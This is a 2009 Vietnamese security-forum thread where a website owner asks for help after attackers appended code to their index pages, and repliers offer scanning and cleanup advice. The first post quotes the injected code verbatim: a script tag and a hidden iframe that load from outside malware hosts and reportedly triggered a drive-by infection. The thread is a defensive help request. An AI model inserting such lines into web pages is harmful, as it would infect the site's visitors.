banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Khai thác lỗ hổng của IE & FF qua mặt cả KAV  XML
  [Discussion]   Khai thác lỗ hổng của IE & FF qua mặt cả KAV 16/10/2009 02:33:44 (+0700) | #1 | 195686
gadapchetvoi
Member

[Minus]    0    [Plus]
Joined: 11/01/2009 20:14:43
Messages: 14
Offline
[Profile] [PM]
Website của tôi bị hack (trực tiếp hay local attack tui ko rõ) và hacker đã cài virus vào website bằng cách thêm vào cuối mỗi trang "index" hoặc "default" một dòng code như thế này :


Code:
<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ></script>

<div style="display:none">wuvefkhghifpzmuklyabmhikryjnqoa<iframe width=751 height=442 src="http://age-t.ru:8080/index.php" ></iframe></div>



Khi website của tôi được google cảnh báo là có trojan, tôi rất ngạc nhiên và truy cập thử bằng IE, tự nhiên màn hình nhảy ra một cái popup : "Preparing to install..."

Kể từ lúc đó, TaskMgr không bật lên được. Tôi thử logout ngay lập tức, nhưng khi logout ra thì màn hình đen ngòm. Khởi động lại màn hình vào đến phần (đáng ra phải là) "Welcome" cũng đen ngòm (dù có vào Safe mode)

Sau khi Ghost lại, tôi đã cẩn thận truy cập lại website bằng FF. Mặc dù lúc đó không thấy có hiện tượng gì lạ, nhưng khi tui bật TaskMgr thấy ko được, xác định lại phải Ghost lại lần 2.

Cả 2 lần truy cập trên máy đều đang cài KAV 9, nhưng có lẽ KAV không đối phó kịp với con virus này.

Tôi thử liều truy cập và lấy file Script của nó từ nguồn : "http://age-t.ru:8080/index.php" thì xem thấy nó là 1 file chứa code JS đã bị mã hóa.

Xin các bạn giúp tôi xác định xem nó thuộc thể loại gì và mức độ nguy hiểm ra sao được không? (Hoặc phải xử lý thế nào nếu lần sau gặp phải loại website như thế này - và máy tính tiếp tục dính ?)


[Up] [Print Copy]
  [Discussion]   Khai thác lỗ hổng của IE & FF qua mặt cả KAV 21/11/2009 09:52:34 (+0700) | #2 | 198795
linhkut3
Member

[Minus]    0    [Plus]
Joined: 13/11/2009 18:34:29
Messages: 1
Offline
[Profile] [PM]
Mã hóa = JS rùi quét trên unix.
[Up] [Print Copy]
  [Discussion]   Khai thác lỗ hổng của IE & FF qua mặt cả KAV 21/11/2009 10:14:17 (+0700) | #3 | 198796
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]
Để tránh lần sau bị nhiễm như vậy, bạn dùng các trang web có dịch vụ quét link trước khi click vào xem có malware hay mã exploit không, quét bằng nhiều dịch vụ thì càng tốt .
Về phòng tránh website bị hack và phục hồi lại bạn có thể tham khảo link sau:
http://25yearsofprogramming.com/blog/20070705.htm

Mình dùng OpenDNS thì gặp thông báo sau khi truy cập hxxp://age-t.ru:8080/index.php : "Hmm, age-t.ru isn't loading right now.
The computers that run age-t.ru are having some trouble. Usually this is just a temporary problem, so you might want to try again in a few minutes."
Đợi khi trang này "sống" trở lại, bạn thông báo mọi người ở đây, chắc sẽ có người vui vẻ giúp bạn xem cụ thể hơn thôi.
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Discussion]   Khai thác lỗ hổng của IE & FF qua mặt cả KAV 25/11/2009 03:50:21 (+0700) | #4 | 199069
anhhainhaque
Member

[Minus]    0    [Plus]
Joined: 27/07/2009 17:07:55
Messages: 6
Offline
[Profile] [PM]
Hi,
Bạn cho biết địa chỉ cụ thể của trang web của bạn là gì để còn test xem sao.
[Up] [Print Copy]
  [Discussion]   Khai thác lỗ hổng của IE & FF qua mặt cả KAV 26/11/2009 01:47:25 (+0700) | #5 | 199135
[Avatar]
holiganvn
Member

[Minus]    0    [Plus]
Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline
[Profile] [PM]
/hvaonline/posts/list/31982.html
HaCk t0 LeArN,N0t LeArN t0 HaCk
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|